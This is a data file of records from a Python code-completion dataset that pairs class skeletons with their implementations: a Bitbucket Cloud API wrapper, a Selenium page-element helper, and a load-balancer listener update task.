"43845e3ec61dd8805073af5bd2c0bf7afb20db52", "bodies": ["expected_type = kwargs.pop('expected_type', None)\nsuper(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\nif expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))", "links = self.get_data('links')\nif links is None or link not in links:\n return None\nreturn links[link]['href']", "if params is None:\n params = {}\nif paging_workaround:\n params['page'] = 1\nwhile True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = True\n params = {}\n trailing = False\nreturn", "if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\nelse:\n response.raise_for_status()"], "bodies_text": "<|body_start_0|>\n expected_type = kwargs.pop('expected_type', None)\n super(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\n if expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))\n<|end_body_0|>\n\n<|body_start_1|>\n links = self.get_data('links')\n if links is None or link not in links:\n return None\n return links[link]['href']\n<|end_body_1|>\n\n<|body_start_2|>\n if params is None:\n params = {}\n if paging_workaround:\n params['page'] = 1\n while True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = True\n params = {}\n trailing = False\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\n else:\n response.raise_for_status()\n<|end_body_3|>\n", "class_docstring": "", "class_name": "BitbucketCloudBase", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BitbucketCloudBase:\n\n def __init__(self, url, *args, **kwargs):\n \"\"\"Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\"\"\"\n <|body_0|>\n\n def get_link(self, link):\n \"\"\"Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present\"\"\"\n <|body_1|>\n\n def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False):\n \"\"\"Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\"\"\"\n <|body_2|>\n\n def raise_for_status(self, response):\n \"\"\"Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n expected_type = kwargs.pop('expected_type', None)\n super(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\n if expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))\n<|end_body_0|>\n\n<|body_start_1|>\n links = self.get_data('links')\n if links is None or link not in links:\n return None\n return links[link]['href']\n<|end_body_1|>\n\n<|body_start_2|>\n if params is None:\n params = {}\n if paging_workaround:\n params['page'] = 1\n while True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = True\n params = {}\n trailing = False\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\n else:\n response.raise_for_status()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000106", "length_bytes": 4094, "license_type": "permissive", "methods": [{"docstring": "Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing", "name": "__init__", "signature": "def __init__(self, url, *args, **kwargs)"}, {"docstring": "Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present", "name": "get_link", "signature": "def get_link(self, link)"}, {"docstring": "Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements", "name": "_get_paged", "signature": "def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False)"}, {"docstring": "Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:", "name": "raise_for_status", "signature": "def raise_for_status(self, response)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_004678", "prompt": "Implement the Python class `BitbucketCloudBase` described below.\n\nClass description:\nImplement the BitbucketCloudBase class.\n\nMethod signatures and docstrings:\n- def __init__(self, url, *args, **kwargs): Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\n- def get_link(self, link): Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present\n- def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False): Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\n- def raise_for_status(self, response): Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:", "prompted_full_text": "Implement the Python class `BitbucketCloudBase` described below.\n\nClass description:\nImplement the BitbucketCloudBase class.\n\nMethod signatures and docstrings:\n- def __init__(self, url, *args, **kwargs): Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\n- def get_link(self, link): Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present\n- def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False): Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\n- def raise_for_status(self, response): Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\n\n<|skeleton|>\nclass BitbucketCloudBase:\n\n def __init__(self, url, *args, **kwargs):\n \"\"\"Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\"\"\"\n <|body_0|>\n\n def get_link(self, link):\n \"\"\"Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present\"\"\"\n <|body_1|>\n\n def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False):\n \"\"\"Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\"\"\"\n <|body_2|>\n\n def raise_for_status(self, response):\n \"\"\"Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n expected_type = kwargs.pop('expected_type', None)\n super(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\n if expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))\n<|end_body_0|>\n\n<|body_start_1|>\n links = self.get_data('links')\n if links is None or link not in links:\n return None\n return links[link]['href']\n<|end_body_1|>\n\n<|body_start_2|>\n if params is None:\n params = {}\n if paging_workaround:\n params['page'] = 1\n while True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = True\n params = {}\n trailing = False\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\n else:\n response.raise_for_status()\n<|end_body_3|>\n", "revision_id": "bb1c0f2d4187ba8efa1a838cd0041b54c944fee8", "skeleton": "<|skeleton|>\nclass BitbucketCloudBase:\n\n def __init__(self, url, *args, **kwargs):\n \"\"\"Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\"\"\"\n <|body_0|>\n\n def get_link(self, link):\n \"\"\"Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present\"\"\"\n <|body_1|>\n\n def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False):\n \"\"\"Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\"\"\"\n <|body_2|>\n\n def raise_for_status(self, response):\n \"\"\"Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BitbucketCloudBase:\n def __init__(self, url, *args, **kwargs):\n \"\"\"Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\"\"\"\n expected_type = kwargs.pop('expected_type', None)\n super(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\n if expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))\n\n def get_link(self, link):\n \"\"\"Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present\"\"\"\n links = self.get_data('links')\n if links is None or link not in links:\n return None\n return links[link]['href']\n\n def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False):\n \"\"\"Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\"\"\"\n if params is None:\n params = {}\n if paging_workaround:\n params['page'] = 1\n while True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = True\n params = {}\n trailing = False\n return\n\n def raise_for_status(self, response):\n \"\"\"Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\"\"\"\n if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\n else:\n response.raise_for_status()\n", "source": "the_stack_v2_python_sparse", "source_path": "atlassian/bitbucket/cloud/base.py", "source_repo": "atlassian-api/atlassian-python-api", "split": "test", "star_events_count": 1130} {"blob_id": "dbebde59ed8a0e43fb4bbed39a6923d5ca52d483", "bodies": ["self.driver = driver\nself.by = by\nself.value = value\nself.locator = (self.by, self.value)\nself.webelement = None", "element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\nself.webelement = element\nreturn None", "element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\nself.webelement = element\nself.webelement.click()\nreturn None", "element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\nself.webelement = element\nreturn bool(self.webelement)", "element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\nself.webelement = element\nreturn self.webelement.isEnabled()", "element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\nself.webelement = element\nself.webelement.send_keys(text)\nreturn None"], "bodies_text": "<|body_start_0|>\n self.driver = driver\n self.by = by\n self.value = value\n self.locator = (self.by, self.value)\n self.webelement = None\n<|end_body_0|>\n\n<|body_start_1|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\n self.webelement = element\n self.webelement.click()\n return None\n<|end_body_2|>\n\n<|body_start_3|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return bool(self.webelement)\n<|end_body_3|>\n\n<|body_start_4|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return self.webelement.isEnabled()\n<|end_body_4|>\n\n<|body_start_5|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n self.webelement.send_keys(text)\n return None\n<|end_body_5|>\n", "class_docstring": "This represents the element", "class_name": "BaseElement", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BaseElement:\n \"\"\"This represents the element\"\"\"\n\n def __init__(self, driver, by, value):\n \"\"\"This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\"\"\"\n <|body_0|>\n\n def find(self):\n \"\"\"This is used to find the element :return:\"\"\"\n <|body_1|>\n\n def click(self):\n \"\"\"This is used to click the element :return:\"\"\"\n <|body_2|>\n\n def is_visible(self):\n \"\"\"This is check whether element is visible :return: returns the boolean value\"\"\"\n <|body_3|>\n\n def is_enabled(self):\n \"\"\"This is used to check whether element is enabled :return: returns the boolean value\"\"\"\n <|body_4|>\n\n def enter_text(self, text):\n \"\"\"This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.driver = driver\n self.by = by\n self.value = value\n self.locator = (self.by, self.value)\n self.webelement = None\n<|end_body_0|>\n\n<|body_start_1|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\n self.webelement = element\n self.webelement.click()\n return None\n<|end_body_2|>\n\n<|body_start_3|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return bool(self.webelement)\n<|end_body_3|>\n\n<|body_start_4|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return self.webelement.isEnabled()\n<|end_body_4|>\n\n<|body_start_5|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n self.webelement.send_keys(text)\n return None\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000107", "length_bytes": 2273, "license_type": "no_license", "methods": [{"docstring": "This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value", "name": "__init__", "signature": "def __init__(self, driver, by, value)"}, {"docstring": "This is used to find the element :return:", "name": "find", "signature": "def find(self)"}, {"docstring": "This is used to click the element :return:", "name": "click", "signature": "def click(self)"}, {"docstring": "This is check whether element is visible :return: returns the boolean value", "name": "is_visible", "signature": "def is_visible(self)"}, {"docstring": "This is used to check whether element is enabled :return: returns the boolean value", "name": "is_enabled", "signature": "def is_enabled(self)"}, {"docstring": "This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing", "name": "enter_text", "signature": "def enter_text(self, text)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_003515", "prompt": "Implement the Python class `BaseElement` described below.\n\nClass description:\nThis represents the element\n\nMethod signatures and docstrings:\n- def __init__(self, driver, by, value): This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\n- def find(self): This is used to find the element :return:\n- def click(self): This is used to click the element :return:\n- def is_visible(self): This is check whether element is visible :return: returns the boolean value\n- def is_enabled(self): This is used to check whether element is enabled :return: returns the boolean value\n- def enter_text(self, text): This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing", "prompted_full_text": "Implement the Python class `BaseElement` described below.\n\nClass description:\nThis represents the element\n\nMethod signatures and docstrings:\n- def __init__(self, driver, by, value): This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\n- def find(self): This is used to find the element :return:\n- def click(self): This is used to click the element :return:\n- def is_visible(self): This is check whether element is visible :return: returns the boolean value\n- def is_enabled(self): This is used to check whether element is enabled :return: returns the boolean value\n- def enter_text(self, text): This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing\n\n<|skeleton|>\nclass BaseElement:\n \"\"\"This represents the element\"\"\"\n\n def __init__(self, driver, by, value):\n \"\"\"This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\"\"\"\n <|body_0|>\n\n def find(self):\n \"\"\"This is used to find the element :return:\"\"\"\n <|body_1|>\n\n def click(self):\n \"\"\"This is used to click the element :return:\"\"\"\n <|body_2|>\n\n def is_visible(self):\n \"\"\"This is check whether element is visible :return: returns the boolean value\"\"\"\n <|body_3|>\n\n def is_enabled(self):\n \"\"\"This is used to check whether element is enabled :return: returns the boolean value\"\"\"\n <|body_4|>\n\n def enter_text(self, text):\n \"\"\"This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.driver = driver\n self.by = by\n self.value = value\n self.locator = (self.by, self.value)\n self.webelement = None\n<|end_body_0|>\n\n<|body_start_1|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return None\n<|end_body_1|>\n\n<|body_start_2|>\n element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\n self.webelement = element\n self.webelement.click()\n return None\n<|end_body_2|>\n\n<|body_start_3|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return bool(self.webelement)\n<|end_body_3|>\n\n<|body_start_4|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return self.webelement.isEnabled()\n<|end_body_4|>\n\n<|body_start_5|>\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n self.webelement.send_keys(text)\n return None\n<|end_body_5|>\n", "revision_id": "2b7edfafc4e448bd558c034044570496ca68bf2d", "skeleton": "<|skeleton|>\nclass BaseElement:\n \"\"\"This represents the element\"\"\"\n\n def __init__(self, driver, by, value):\n \"\"\"This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\"\"\"\n <|body_0|>\n\n def find(self):\n \"\"\"This is used to find the element :return:\"\"\"\n <|body_1|>\n\n def click(self):\n \"\"\"This is used to click the element :return:\"\"\"\n <|body_2|>\n\n def is_visible(self):\n \"\"\"This is check whether element is visible :return: returns the boolean value\"\"\"\n <|body_3|>\n\n def is_enabled(self):\n \"\"\"This is used to check whether element is enabled :return: returns the boolean value\"\"\"\n <|body_4|>\n\n def enter_text(self, text):\n \"\"\"This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BaseElement:\n \"\"\"This represents the element\"\"\"\n\n def __init__(self, driver, by, value):\n \"\"\"This initializes the values :param driver: arg1 and webdriver :param by: arg2 and the by element :param value: arg3 and the value\"\"\"\n self.driver = driver\n self.by = by\n self.value = value\n self.locator = (self.by, self.value)\n self.webelement = None\n\n def find(self):\n \"\"\"This is used to find the element :return:\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return None\n\n def click(self):\n \"\"\"This is used to click the element :return:\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable(locator=self.locator))\n self.webelement = element\n self.webelement.click()\n return None\n\n def is_visible(self):\n \"\"\"This is check whether element is visible :return: returns the boolean value\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return bool(self.webelement)\n\n def is_enabled(self):\n \"\"\"This is used to check whether element is enabled :return: returns the boolean value\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n return self.webelement.isEnabled()\n\n def enter_text(self, text):\n \"\"\"This is used to enter the text :param text: arg1 and text to enter into the element :return: nothing\"\"\"\n element = WebDriverWait(self.driver, 10).until(EC.visibility_of_element_located(locator=self.locator))\n self.webelement = element\n self.webelement.send_keys(text)\n return None\n", "source": "the_stack_v2_python_sparse", "source_path": "Page_Object_Model3_Amazon/base_element.py", "source_repo": "gsudarshan1990/Training_Projects", "split": "test", "star_events_count": 0} {"blob_id": "b22621c2824edd4d76205465293d585298c43cc6", "bodies": ["for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')", "LOG.warning('Reverting listeners updates.')\nfor listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\nreturn None"], "bodies_text": "<|body_start_0|>\n for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')\n<|end_body_0|>\n\n<|body_start_1|>\n LOG.warning('Reverting listeners updates.')\n for listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\n return None\n<|end_body_1|>\n", "class_docstring": "Task to update amphora with all specified listeners' configurations.", "class_name": "ListenersUpdate", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ListenersUpdate:\n \"\"\"Task to update amphora with all specified listeners' configurations.\"\"\"\n\n def execute(self, loadbalancer, listeners, vthunder):\n \"\"\"Execute updates per listener for an amphora.\"\"\"\n <|body_0|>\n\n def revert(self, loadbalancer, *args, **kwargs):\n \"\"\"Handle failed listeners updates.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')\n<|end_body_0|>\n\n<|body_start_1|>\n LOG.warning('Reverting listeners updates.')\n for listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\n return None\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000108", "length_bytes": 10501, "license_type": "permissive", "methods": [{"docstring": "Execute updates per listener for an amphora.", "name": "execute", "signature": "def execute(self, loadbalancer, listeners, vthunder)"}, {"docstring": "Handle failed listeners updates.", "name": "revert", "signature": "def revert(self, loadbalancer, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007311", "prompt": "Implement the Python class `ListenersUpdate` described below.\n\nClass description:\nTask to update amphora with all specified listeners' configurations.\n\nMethod signatures and docstrings:\n- def execute(self, loadbalancer, listeners, vthunder): Execute updates per listener for an amphora.\n- def revert(self, loadbalancer, *args, **kwargs): Handle failed listeners updates.", "prompted_full_text": "Implement the Python class `ListenersUpdate` described below.\n\nClass description:\nTask to update amphora with all specified listeners' configurations.\n\nMethod signatures and docstrings:\n- def execute(self, loadbalancer, listeners, vthunder): Execute updates per listener for an amphora.\n- def revert(self, loadbalancer, *args, **kwargs): Handle failed listeners updates.\n\n<|skeleton|>\nclass ListenersUpdate:\n \"\"\"Task to update amphora with all specified listeners' configurations.\"\"\"\n\n def execute(self, loadbalancer, listeners, vthunder):\n \"\"\"Execute updates per listener for an amphora.\"\"\"\n <|body_0|>\n\n def revert(self, loadbalancer, *args, **kwargs):\n \"\"\"Handle failed listeners updates.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for listener in listeners:\n listener.load_balancer = loadbalancer\n try:\n c = self.client_factory(vthunder)\n name = loadbalancer.id + '_' + str(listener.protocol_port)\n if listener.protocol == 'TERMINATED_HTTPS':\n listener.protocol = 'HTTPS'\n out = c.slb.virtual_server.vport.update(loadbalancer.id, name, listener.protocol, listener.protocol_port, listener.default_pool_id)\n LOG.info('Listener created successfully.')\n except Exception as e:\n print(str(e))\n LOG.info('Error occurred')\n<|end_body_0|>\n\n<|body_start_1|>\n LOG.warning('Reverting listeners updates.')\n for listener in loadbalancer.listeners:\n self.task_utils.mark_listener_prov_status_error(listener.id)\n return None\n<|end_body_1|>\n", "revision_id": "dddb3e4695c38cbb72ecf7f99a8e746869590ae2", "skeleton": "<|skeleton|>\nclass ListenersUpdate:\n \"\"\"Task to update amphora with all specified listeners' configurations.\"\"\"\n\n def execute(self, loadbalancer, listeners, vthunder):\n \"\"\"Execute updates per listener for an amphora.\"\"\"\n <|body_0|>\n\n def revert(self, loadbalancer, *args, **kwargs):\n \"\"\"Handle failed listeners updates.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", 